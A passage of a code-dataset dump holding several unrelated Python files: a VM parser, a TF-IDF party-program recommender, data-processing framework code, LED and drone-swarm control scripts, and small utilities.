pl_status)\nprint(\"status_api:\\n%s\" % r.text)\n\n","sub_path":"Scripts/Others/DEPRECATED/m/fund_index_12_m.py","file_name":"fund_index_12_m.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"153309799","text":"import re\n\nclass Parser:\n\tdef __init__(self, path):\n\t\tself.C_ARITHMETIC = 'C_ARITHMETIC'\n\t\tself.C_PUSH = 'C_PUSH'\n\t\tself.C_POP = 'C_POP'\n\t\tself.C_LABEL = 'C_LABEL'\n\t\tself.C_GOTO = 'C_GOTO'\n\t\tself.C_IF = 'C_IF'\n\t\tself.C_FUNCTION = 'C_FUNCTION'\n\t\tself.C_RETURN = 'C_RETURN'\n\t\tself.C_CALL = 'C_CALL'\n\n\t\tself._CMD_DICT = {\n\t\t\t'push': self.C_PUSH,\n\t\t\t'pop': self.C_POP,\n\t\t\t'label': self.C_LABEL,\n\t\t\t'goto': self.C_GOTO,\n\t\t\t'if-goto': self.C_IF,\n\t\t\t'function': self.C_FUNCTION,\n\t\t\t'return': self.C_RETURN,\n\t\t\t'call': self.C_CALL,\n\t\t\t'add': self.C_ARITHMETIC,\n\t\t\t'sub': self.C_ARITHMETIC,\n\t\t\t'neg': self.C_ARITHMETIC,\n\t\t\t'eq': self.C_ARITHMETIC,\n\t\t\t'gt': self.C_ARITHMETIC,\n\t\t\t'lt': self.C_ARITHMETIC,\n\t\t\t'and': self.C_ARITHMETIC,\n\t\t\t'or': self.C_ARITHMETIC,\n\t\t\t'not': self.C_ARITHMETIC\n\t\t}\n\n\t\tself._lines = []\n\t\tself._current_line = 0\n\n\t\tfile = open(path, 'r')\n\t\tlines = file.read().split('\\n')\n\t\tfor line in lines:\n\t\t\tline = line.replace('\\r', '')\n\t\t\tstripped = self._strip_line(line)\n\t\t\tif len(stripped) > 0:\n\t\t\t\tself._lines.append(stripped)\n\n\t\tself.reset()\n\n\tdef reset(self):\n\t\tself._current_line = 0\n\t\tif len(self._lines) > self._current_line:\n\t\t\tself._next_command = self._lines[self._current_line]\n\t\telse:\n\t\t\tself._next_command = None\n\n\tdef hasMoreCommands(self):\n\t\treturn self._next_command is not None\n\n\tdef advance(self):\n\t\tif self._next_command is not None:\n\t\t\tself._current_command = self._next_command\n\n\t\t\tif len(self._lines) > self._current_line + 1:\n\t\t\t\tself._next_command = 
self._lines[self._current_line + 1]\n\t\t\telse:\n\t\t\t\tself._next_command = None\n\t\t\tself._current_line += 1\n\n\tdef commandType(self):\n\t\tcommand = self._getArg(0)\n\t\t\t\n\t\tif command in self._CMD_DICT:\n\t\t\treturn self._CMD_DICT[command]\n\t\traise Exception(\"Invalid command\")\n\n\tdef command(self):\n\t\treturn self._getArg(0)\n\n\tdef arg1(self):\n\t\treturn self._getArg(1)\n\t\t\t\n\tdef arg2(self):\n\t\treturn self._getArg(2)\n\n\tdef _getArg(self, ind):\n\t\tcmd = self._current_command\n\t\tfields = cmd.split(' ')\n\t\tif len(fields) < ind + 1:\n\t\t\treturn None\n\t\treturn fields[ind]\n\n\tdef _strip_line(self, line):\n\t\tstripped = re.sub('//.*$', '', line)\n\t\treturn stripped.strip().replace('\\r', '')","sub_path":"projects/07/VM/VM/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440461325","text":"import PyPDF2\nfrom PyPDF2 import PdfFileReader\n\nimport pandas as pd\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import stopwords\nfrom nltk import FreqDist\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\nimport spacy\nfrom spacy.lang.es import Spanish\nfrom spacy.lang.es.stop_words import STOP_WORDS\n\nimport sklearn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport string\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nquestion = [str(input(\"¿Que quieres de España?: \"))]\n\ndef extract_pdf(paths):\n all_parties = []\n for path in paths:\n party_pdf = open(path, mode='rb')\n party = PyPDF2.PdfFileReader(party_pdf)\n pages = party.getNumPages()\n all_text = []\n for page in range(pages):\n info = party.getPage(page)\n text = info.extractText()\n text_clean = 
re.sub('\\n', '', text)\n text_clean = re.sub(\"˜\", \"fi\", text_clean)\n text_clean = re.sub(\"-\", \"\", text_clean)\n # text_clean=re.sub(\"á\", \"a\", text_clean)\n # text_clean=re.sub(\"é\", \"e\", text_clean)\n # text_clean=re.sub(\"í\", \"i\", text_clean)\n # text_clean=re.sub(\"ó\", \"o\", text_clean)\n # text_clean=re.sub(\"ú\", \"u\", text_clean)\n all_text.append(text_clean)\n all_parties.append(str(all_text))\n\n return all_parties\n\ndef spacy_tokenizer(sentence):\n nlp=spacy.load('es')\n parser = Spanish()\n spacy_stopwords = spacy.lang.es.stop_words.STOP_WORDS\n STOPWORDS=list(spacy_stopwords)\n STOPWORDS.extend(('y','a','u','o','e'))\n tokens = parser(sentence)\n filtered_tokens = []\n for word in tokens:\n lemma = word.lemma_.lower().strip()\n lemma=re.sub(\"á\", \"a\", lemma)\n lemma=re.sub(\"é\", \"e\", lemma)\n lemma=re.sub(\"í\", \"i\", lemma)\n lemma=re.sub(\"ó\", \"o\", lemma)\n lemma=re.sub(\"ú\", \"u\", lemma)\n lemma=re.sub(\"ñ\", \"n\", lemma)\n if lemma not in STOPWORDS and re.search('^[a-zA-Z]+$', lemma):\n filtered_tokens.append(lemma)\n return filtered_tokens\n\n\ndef tfdif_vect(parties, text):\n tfidf_vectorizer = TfidfVectorizer(tokenizer=spacy_tokenizer)\n tfidf_matrix = tfidf_vectorizer.fit_transform(parties)\n text_transformed=tfidf_vectorizer.transform(text)\n return cosine_similarity(tfidf_matrix, text_transformed)\n\ndef plot_result(result):\n df = pd.DataFrame(result, index=party_names)\n df.plot(kind='bar', colors = 'mrybg')\n plt.title('Recomendación de Voto')\n plt.xlabel('Partidos')\n plt.ylabel('Similaridad')\n return plt.show()\n\n\n\nparty_names=['Podemos','PSOE','Ciudadanos', 'PP','Vox']\npath_list=['data/podemos.pdf','data/psoe.pdf','data/ciudadanos.pdf','data/pp.pdf','data/vox.pdf']\nparties=extract_pdf(path_list)\nsimilarities=tfdif_vect(parties, question)\nplot_result(similarities)\n","sub_path":"saved tuesday version.py","file_name":"saved tuesday 
version.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91452292","text":"# pylint: disable=duplicate-code\n\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any, Sequence, cast\n\nimport joblib\nimport numpy as np\nfrom attrs import define\nfrom sklearn.base import BaseEstimator\n\nimport skrough.typing as rght\nfrom skrough.algorithms.constants import RNG_INTEGERS_PARAM\nfrom skrough.algorithms.meta.aggregates import UpdateStateHooksAggregate\nfrom skrough.algorithms.meta.describe import (\n autogenerate_description_node,\n describe,\n inspect_config_keys,\n inspect_input_data_keys,\n inspect_values_keys,\n)\nfrom skrough.algorithms.meta.helpers import normalize_sequence\nfrom skrough.algorithms.meta.stage import Stage\nfrom skrough.algorithms.meta.visual_block import sk_visual_block\nfrom skrough.logs import log_start_end\nfrom skrough.structs.description_node import NODE_META_OPTIONAL_KEY\nfrom skrough.structs.state import ProcessingState, StateConfig, StateInputData\n\nlogger = logging.getLogger(__name__)\n\n\n@define\nclass ProcessingMultiStage(rght.Describable):\n init_multi_stage_agg: UpdateStateHooksAggregate\n init_agg: UpdateStateHooksAggregate\n stages: Sequence[Stage]\n finalize_agg: UpdateStateHooksAggregate\n prepare_result_fun: rght.PrepareResultFunction\n\n # pylint: disable-next=protected-access\n _repr_mimebundle_ = BaseEstimator._repr_mimebundle_\n _sk_visual_block_ = sk_visual_block\n\n @classmethod\n @log_start_end(logger)\n def from_hooks(\n cls,\n prepare_result_fun: rght.PrepareResultFunction,\n init_multi_stage_hooks: None\n | (rght.OneOrSequence[rght.UpdateStateHook]) = None,\n init_hooks: rght.OneOrSequence[rght.UpdateStateHook] | None = None,\n stages: rght.OneOrSequence[Stage] | None = None,\n finalize_hooks: rght.OneOrSequence[rght.UpdateStateHook] | None = None,\n ):\n return cls(\n 
init_multi_stage_agg=UpdateStateHooksAggregate.from_hooks(\n init_multi_stage_hooks\n ),\n init_agg=UpdateStateHooksAggregate.from_hooks(init_hooks),\n stages=normalize_sequence(stages, optional=True),\n finalize_agg=UpdateStateHooksAggregate.from_hooks(finalize_hooks),\n prepare_result_fun=prepare_result_fun,\n )\n\n @log_start_end(logger)\n def __call__(\n self,\n state: ProcessingState | None = None,\n input_data: StateInputData | None = None,\n config: StateConfig | None = None,\n seed: rght.Seed = None,\n ) -> Any:\n logger.debug(\"Create state object\")\n if state is None:\n logger.debug(\"No state passed, create new one from config, input and seed\")\n state = ProcessingState.from_optional(\n rng=np.random.default_rng(seed),\n processing_fun=self,\n config=config,\n input_data=input_data,\n )\n logger.debug(\"Run init state hooks\")\n self.init_multi_stage_agg(state)\n\n logger.debug(\"Run init hooks\")\n self.init_agg(state)\n\n logger.debug(\"Run stages sequentially\")\n for i, stage in enumerate(self.stages):\n logger.debug(\"Run stage %d\", i)\n stage(state)\n\n logger.debug(\"Run finalize hooks\")\n self.finalize_agg(state)\n\n logger.debug(\"Prepare result function\")\n result = self.prepare_result_fun(state)\n return result\n\n @log_start_end(logger)\n def call_parallel(\n self,\n n_times: int,\n state: ProcessingState | None = None,\n input_data: StateInputData | None = None,\n config: StateConfig | None = None,\n seed: rght.Seed = None,\n n_jobs: int | None = None,\n ) -> list[Any]:\n rng = np.random.default_rng(seed)\n result = joblib.Parallel(n_jobs=n_jobs)(\n joblib.delayed(self)(\n state=state,\n input_data=input_data,\n config=config,\n seed=rng.integers(RNG_INTEGERS_PARAM),\n )\n for _ in range(n_times)\n )\n return cast(list[Any], result)\n\n def get_description_graph(self):\n result = autogenerate_description_node(\n processing_element=self, process_docstring=True\n )\n result.children = [\n describe(\n self.init_multi_stage_agg,\n 
override_node_name=\"init_multi_stage\",\n override_node_meta={NODE_META_OPTIONAL_KEY: True},\n ),\n describe(\n self.init_agg,\n override_node_name=\"init\",\n ),\n describe(\n self.stages,\n override_node_name=\"stages\",\n ),\n describe(\n self.finalize_agg,\n override_node_name=\"finalize\",\n ),\n describe(\n self.prepare_result_fun,\n override_node_name=\"prepare_result\",\n ),\n ]\n return result\n\n def _get_children_processing_elements(self):\n return [\n self.init_multi_stage_agg,\n self.init_agg,\n *self.stages,\n self.finalize_agg,\n self.prepare_result_fun,\n ]\n\n def get_config_keys(self) -> list[str]:\n return self._get_keys_from_elements(\n children=self._get_children_processing_elements(),\n inspect_keys_function=inspect_config_keys,\n )\n\n def get_input_data_keys(self) -> list[str]:\n return self._get_keys_from_elements(\n children=self._get_children_processing_elements(),\n inspect_keys_function=inspect_input_data_keys,\n )\n\n def get_values_keys(self) -> list[str]:\n return self._get_keys_from_elements(\n children=self._get_children_processing_elements(),\n inspect_keys_function=inspect_values_keys,\n )\n","sub_path":"src/skrough/algorithms/meta/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522405166","text":"#!/usr/bin/env python\n\n# light every nth LED. 
adjust n.\n\nimport opc, time\n\nnumLEDs = 512\nstep = 1\nsleep=0.15\nmaxn = 50\na=1\nb=maxn\nrlum=1\nglum=1\nblum=1\n\nclient = opc.Client('localhost:7890')\n\nwhile True:\n\tfor n in range(a,b,step):\n\t\tpixels = [ (0,0,0) ] * numLEDs\n\t\tfor i in range(numLEDs):\n\t\t\tx=i%n\n\t\t\tpix=255-(x*(255/maxn))\n\t\t\tpixels[i] = (pix*rlum,pix*glum,pix*blum)\n\t\tclient.put_pixels(pixels)\n\t\ttime.sleep(sleep)\n\n\tstep *= -1\n\tc=a\n\ta=b\n\tb=c\n","sub_path":"fadecandy/examples/python/skip.py","file_name":"skip.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345726082","text":"import sys\n\nfrom setuptools import find_packages, setup\n\nassert sys.version_info >= (3, 3), \"python >= 3.3 required\"\n\n\n# with open('requirements.txt') as requirements:\n# requires = requirements.read().splitlines()\n\nrequires = [\n 'arrow',\n 'pycommon>=0.5',\n 'numpy'\n]\n\nsetup(name='stockjournal',\n version=\"1.0\",\n description='stock calculator',\n author='Robert Zaremba',\n author_email='robert.zaremba@scale-it.pl',\n packages=find_packages(exclude=['test', 'test.*', 'build.*']),\n install_requires=requires,\n tests_require=['pytest'],\n dependency_links=['git+https://github.com/robert-zaremba/py-common.git#egg=pycommon-0.5'],\n entry_points={\n 'console_scripts': [\n # 'name = pkg.path:main',\n ]},\n classifiers=[\n 'Environment :: Console',\n 'Operating System :: OS Independent',\n\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3 :: Only'])\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"211766433","text":"import cv2\nimport numpy as np\n\n'''Collection of various utility functions.'''\n\ndef rotate_image(image=None, angle=0, w=-1, h=-1):\n\t'''\n\tRotate 
image by angle without cutting.\n\tAlso used to calculate bounding box dimensions for rotation.\n\n\tArgs:\n\t\timage: image to transform (otherwise, only calculates bounding box)\n\t\tangle: counter-clockwise angle of rotation in degrees\n\t\t\tw: virtual width, if 'image' is not specified\n\t\t\th: virutal height, if 'image' is not specified\n\n\tReturns:\n\t\tif 'image' is None: bounding box dimensions\n\t\t\t\t otherwise: rotated image\n\t'''\n\n\tif image is not None:\n\t\t# determine dimensions, get center\n\t\t(h, w) = image.shape[:2]\n\t(cW, cH) = (w // 2, h // 2)\n\n\t# calculate sin and cos of rotation\n\tR = cv2.getRotationMatrix2D((cW, cH), angle, 1.0)\n\tcos_R = np.abs(R[0, 0])\n\tsin_R = np.abs(R[0, 1])\n\n\t# compute bounding box dimensions\n\tnW = int((h * sin_R) + (w * cos_R))\n\tnH = int((h * cos_R) + (w * sin_R))\n\tres = (nW, nH)\n\n\tif image is not None:\n\t\t# adjust rotation matrix to take into account translation\n\t\tR[0, 2] += (nW / 2) - cW\n\t\tR[1, 2] += (nH / 2) - cH\n\n\t\t# perform actual rotation and return image\n\t\tres = cv2.warpAffine(image, R, (nW, nH))\n\treturn res\n\n\ndef pair_pixels(img_shape, num_pairs):\n\t'''\n\tConstruct a set of random pixel pairs (from gaussian distribution).\n\tUsed to calculate BRIEF descriptor.\n\n\tArgs:\n\t\timg_shape: dimensions of the image to construct pixel pairs for\n\t\tnum_pairs: number of pixel pairs to construct\n\n\tReturns x-coordinates and y-coordinates of paired pixels.\n\t'''\n\tdim_x, dim_y = img_shape[1], img_shape[0]\n\tx = np.sqrt(dim_x-1) * np.random.randn(num_pairs, 2) + (dim_x-1)/2\n\tx = np.clip(x, 0, dim_x-2).astype(\"int\")\n\n\ty = np.sqrt(dim_y-1) * np.random.randn(num_pairs, 2) + (dim_y-1)/2\n\ty = np.clip(y, 0, dim_y-2).astype(\"int\")\n\treturn x,y\n\n\ndef brief_encode(img, x, y):\n\t'''\n\tCalculate multi-channel BRIEF descriptor for an image.\n\tArgs:\n\t\timg: image to calculate descriptor for\n\t\tx: x-coordinates of pixel pairs [from pair_pixels()]\n\t\ty: 
y-coordinates of pixel pairs [from pair_pixels()]\n\tReturn multi-channel BRIEF descriptor for the image.\n\t'''\n\n\t# construct BRIEF descriptor for each channel\n\tchannel_descriptors = []\n\tfor c in range(img.shape[2]):\n\t\tdescriptor = (img[y[:,0], x[:,0], c] > img[y[:,1], x[:,1], c]).astype(\"uint8\")\n\t\tchannel_descriptors.append(descriptor)\n\n\t# connect channel descriptors\n\tchannel_descriptors = np.array(channel_descriptors)\n\tfull_descriptor = np.concatenate(channel_descriptors[:])\n\treturn full_descriptor\n\n\ndef calc_weight_brief(camera_prediction, particle_prediction):\n\t'''\n\tCalculate particle weight (from ParticleFilter) using BRIEF descriptors.\n\tArgs:\n\t\t camera_prediction: prediction tensor for the camera image\n\t\tparticle_prediction: prediction tensor for the particle area\n\tReturns particle weight.\n\t'''\n\tx, y = pair_pixels(camera_prediction.shape, 64)\n\tcamera_descriptor = brief_encode(camera_prediction, x, y)\n\tparticle_descriptor = brief_encode(particle_prediction, x, y)\n\n\txnor = (camera_descriptor[:] == particle_descriptor[:]).astype(\"uint8\")\n\tweight = np.sum(xnor)/len(xnor)\n\treturn weight\n\n\ndef calc_weight_obj(camera_prediction, particle_prediction):\n\tchannels = camera_prediction.shape[2]\n\tcamera_sum, particle_sum = np.sum(camera_prediction), np.sum(particle_prediction)\n\ttotal_obj_ratio = max(camera_sum/particle_sum, particle_sum/camera_sum)\n\t\n\tclass_totals_camera = np.array([np.sum(camera_prediction[:,:,c]) for c in range(channels)])\n\tclass_totals_camera /= camera_sum\n\t\n\tclass_totals_particle = np.array([np.sum(particle_prediction[:,:,c]) for c in range(channels)])\n\tclass_totals_particle /= particle_sum\n\n\terror = np.sum(np.abs(class_totals_camera - class_totals_particle)) * np.log(total_obj_ratio)\n\tweight = 1/(error+1)\n\treturn weight\n\n\ndef calc_weight_cossim(camera_prediction, particle_prediction):\n\t'''\n\tCalculate particle weight by constructing vectors of class certainty 
sums\n\tand applying Error Sum of Squares.\n\n\tArgs:\n\t\t camera_prediction: prediction tensor for the camera image\n\t\tparticle_prediction: prediction tensor for the particle area\n\tReturns particle weight.\n\t'''\n\n\tchannels = camera_prediction.shape[2]\n\n\tcamera_prediction[camera_prediction < 1/channels] = 0\n\tparticle_prediction[particle_prediction < 1/channels] = 0\n\n\tclass_sums_camera = [np.sum(camera_prediction[:,:,c]) for c in range(channels)]\n\tclass_sums_particle = [np.sum(particle_prediction[:,:,c]) for c in range(channels)]\n\n\tcam_norm = np.linalg.norm(class_sums_camera)\n\tparticle_norm = np.linalg.norm(class_sums_particle)\n\n\tweight = np.dot(class_sums_camera, class_sums_particle) / (cam_norm*particle_norm)\n\treturn weight\n\n\ndef calc_weight_sse(camera_prediction, particle_prediction):\n\t'''\n\tCalculate particle weight by constructing vectors of class certainty sums\n\tand applying Error Sum of Squares.\n\n\tArgs:\n\t\t camera_prediction: prediction tensor for the camera image\n\t\tparticle_prediction: prediction tensor for the particle area\n\tReturns particle weight.\n\t'''\n\n\tchannels = camera_prediction.shape[2]\n\n\tcamera_prediction[camera_prediction < 1/channels] = 0\n\tparticle_prediction[particle_prediction < 1/channels] = 0\n\n\tclass_sums_camera = np.array([np.sum(camera_prediction[:,:,c]) for c in range(channels)])\n\tclass_sums_particle = np.array([np.sum(particle_prediction[:,:,c]) for c in range(channels)])\n\n\tsum_squared_errors = np.sum(np.square(class_sums_camera - class_sums_particle))\n\n\tweight = 1/(sum_squared_errors+1)\n\treturn weight","sub_path":"source/Utility.py","file_name":"Utility.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540951395","text":"##Lets try multi threading with python\nfrom threading import Thread\nimport PyClassInherit\nimport time\n\ndef junkie(tid):\n i=10\n 
log_obj=PyClassInherit.synced_logger(\"INFO\",\"multi_threading.txt\")\n while i>=0:\n msg=str(tid)+\" -- Iteration: \"+str(i)\n log_obj.log_it(str(msg))\n time.sleep(5)\n i-=1\n \n \n##MAIN##\ntask_list=[]\nfor i in [1,2]:\n task=Thread(target=junkie, args=(i,))\n print(task)\n task_list.append(task)\n task.start()\n \nfor task_ in task_list:\n task_.join()\n \n##Next Up Dealing with classes having run method","sub_path":"Multithreading.py","file_name":"Multithreading.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633193101","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport json\n\nfrom models import connect_db\nfrom utils import clean_item\n\n\ndef upload_to_db(file_name):\n \"\"\"Parse json lines file and save in database if needed.\"\"\"\n with open(file_name, \"r\") as handle:\n data = [\n json.loads(i)\n for i in handle.readlines()\n ]\n db = connect_db()\n table = db['papeletas']\n\n papeletas_in_db = get_papeletas(table)\n papeletas_in_file = [i['papeleta'] for i in data]\n\n papeletas_to_insert = set(papeletas_in_file) - set(papeletas_in_db)\n items_to_insert = [\n item\n for item in data\n if item['papeleta'] in papeletas_to_insert\n ]\n\n cleaned_items = [\n clean_item(item)\n for item in items_to_insert\n ]\n table.insert_many(cleaned_items)\n\n\ndef get_papeletas(table):\n return [i['papeleta'] for i in table.all()]\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Analyze fines\")\n parser.add_argument(\n '-i',\n '--input',\n dest='input_file',\n action='store',\n help='JsonLines file with scraped data',\n required=True,\n )\n args = parser.parse_args()\n upload_to_db(args.input_file)\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"upload_scraped_data_to_db.py","file_name":"upload_scraped_data_to_db.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324847983","text":"\"\"\"empty message\n\nRevision ID: 0138f3a43814\nRevises: None\nCreate Date: 2019-06-19 10:12:26.439959\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '0138f3a43814'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('movie',\n sa.Column('key', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=300), nullable=True),\n sa.Column('director', sa.String(length=300), nullable=True),\n sa.Column('date', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('key')\n )\n op.create_table('rate',\n sa.Column('user_rating', sa.Integer(), nullable=False),\n sa.Column('movie_rated', sa.Integer(), nullable=False),\n sa.Column('rating', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('user_rating', 'movie_rated')\n )\n op.create_table('user',\n sa.Column('key', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=300), nullable=True),\n sa.Column('last_name', sa.String(length=300), nullable=True),\n sa.Column('age', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('key')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('user')\n op.drop_table('rate')\n op.drop_table('movie')\n # ### end Alembic commands ###\n","sub_path":"server/migrations/versions/0138f3a43814_.py","file_name":"0138f3a43814_.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"312417832","text":"import numpy as np\nfrom pycrazyswarm import *\nfrom sub_functions import *\nfrom formations import *\nfrom swarm_class import *\nimport random\n\n\n\n\nprint(\"\"\"\n---- Çoban-Z Sürü Drone Algoritmaları Kumanda Modülü ----\n---------------------------------------------------------\nDikkat !! Her formasyon için minimum bir drone sayısı vardır \n\nÜçgen --> 3 \nKare --> 4 \nV --> 5\nBeşgen --> 5\nHilal --> 6\nYıldız --> 10\n\n\"\"\")\n \ndrone_number = int(input(\"Lütfen kaç drone ile başlamak istediğinizi giriniz : \"))\nprint(\"------------------------------------------------\")\nprint(\"------------------------------------------------\")\ntake_off_type = int(input(\"\"\"Dronların eşzamanlı kaldırılmasını istiyorsanız --> 1 \nTeker teker kalkmalarını istiyorsanız --> 2 : \n\"\"\"))\nhight = float(input(\"kaç metre yüksekliğe çıkılsın : \"))\ndistance = float(input(\"elemanlar arasındaki mesafeyi giriniz : \"))\n\nswarm = Crazyswarm()\ntimeHelper = swarm.timeHelper\nallcfs = swarm.allcfs\nswarm.allcfs.takeoff(0,0)\ncrazyflies = allcfs.crazyflies[0:drone_number]\nswarm2 = Swarm(crazyflies,timeHelper,allcfs)\n\nif take_off_type == 1 :\n swarm2.takeoff_ascyn(hight, 5)\nelif take_off_type == 2:\n swarm2.takeoff_scyn(hight, 5)\nelse :\n print(\"hatalı giris yaptiniz\")\n\n\n\nif drone_number == 3:\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\nelif drone_number ==4 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\nelif drone_number ==5 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\n 
print(\"3 --> V formasyonu \")\n print(\"4 --> Beşgen formasyonu \")\nelif drone_number == 6 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\n print(\"3 --> V formasyonu \")\n print(\"4 --> Beşgen formasyonu \")\n print(\"5 --> Hilal formasyonu \")\n \nelif drone_number > 6 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\n print(\"3 --> V formasyonu \")\n print(\"4 --> Beşgen formasyonu \")\n print(\"5 --> Hilal formasyonu \")\n print(\"6 --> Yıldız fprmasyonu\")\n\n \nformation_id = int(input(\"formasyon numarasını giriniz : \"))\n\n\nif formation_id == 1:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 2:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 3:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 4:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 5:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 6:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 7:\n swarm2.take_formation(distance,formation_id,hight,0,0)\n\ncur_x = 0\ncur_y = 0\n\nwhile True :\n print(\"\"\"Formasyonu güncellemek için --> 1\nYükselme veya Alçalma için --> 2 \nRotasyon yaptırmak için --> 3\nNavigasyon yaptırmak için --> 4\nSürü ayrılması için --> 5\nDönerek Navigasyon için --> 6\nSıralı iniş için --> 7\n\"\"\")\n selection = int(input(\"seçiminiz : \"))\n if selection == 1 :\n print(\"\"\" eleman eklemek için --> 1\n eleman çıkarmak için --> 2\n elamanlar arası mesafeyi güncellemek için --> 3\n formasyon değiştirmek için --> 4\n kare formasyonundayken eleman ekleme için --> 5\n \"\"\")\n selection2 = int(input(\"seçiminiz : \"))\n\n if selection2 == 1 :\n swarm2.add_crazyflie(allcfs.crazyflies[drone_number])\n timeHelper.sleep(5)\n drone_number +=1\n 
swarm2.take_formation(distance,formation_id,hight,cur_x,cur_y)\n elif selection2 == 2 :\n rastgele = random.randint(0,drone_number-1)\n print(\"rastgele eleman çıkarılıyor ...\")\n swarm2.remove_crazyflie(swarm2.crazyflies[rastgele])\n drone_number = drone_number -1 \n swarm2.take_formation(distance,formation_id,hight,cur_x,cur_y)\n elif selection2 == 3 :\n aralık = int(input(\"elemanlar arasındaki istediğiniz mesafeyi giriniz : \"))\n distance = aralık\n swarm2.take_formation(aralık,formation_id,hight,cur_x,cur_y)\n elif selection2 == 4 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\n print(\"3 --> V formasyonu \")\n print(\"4 --> Beşgen formasyonu \")\n print(\"5 --> Hilal formasyonu \")\n print(\"6 --> Yıldız formasyonu\")\n print(\"7 --> Daire formasyonu\")\n\n selection3 = int(input(\"seçiminiz : \"))\n formation_id = selection3\n swarm2.change_formation(selection3,distance,cur_x,cur_y)\n \n elif selection == 2 :\n vertical_move = float(input(\"Sürüyü hangi yüksekliğe hareket ettirmek istersiniz : \"))\n swarm2.takeoff_ascyn(vertical_move, 5)\n hight = vertical_move \n\n elif selection == 3 :\n rot = int(input(\"kac derece rotasyon yaptırmak istiyorsunuz : \"))\n print(cur_x)\n print(cur_y)\n swarm2.rotasyon_3(rot,cur_x, cur_y, hight,distance)\n \n\n elif selection == 4 :\n x = float(input(\"navigasyon yapmak istediğiniz noktanın x kordinatını giriniz : \" ))\n y = float(input(\"navigasyon yapmak istediğiniz noktanın y kordinatını giriniz : \" ))\n swarm2.navigation_2([x,y,hight],10)\n cur_x = x \n cur_y = y\n \n elif selection == 5 :\n print(\"sürü ayrılması yapmak için minimum 6 iha bulunmalıdır \")\n if drone_number > 5 :\n print(\"test için bir üçgen ve istediğimiz başka bir formasyon : \")\n sep_swarm = int(input(\"lütfen istediğiniz diğer formasyonu giriniz \"))\n crazyflies_1 = allcfs.crazyflies[0:3]\n crazyflies_2= allcfs.crazyflies[3:drone_number]\n swarm_3,swarm_4 = 
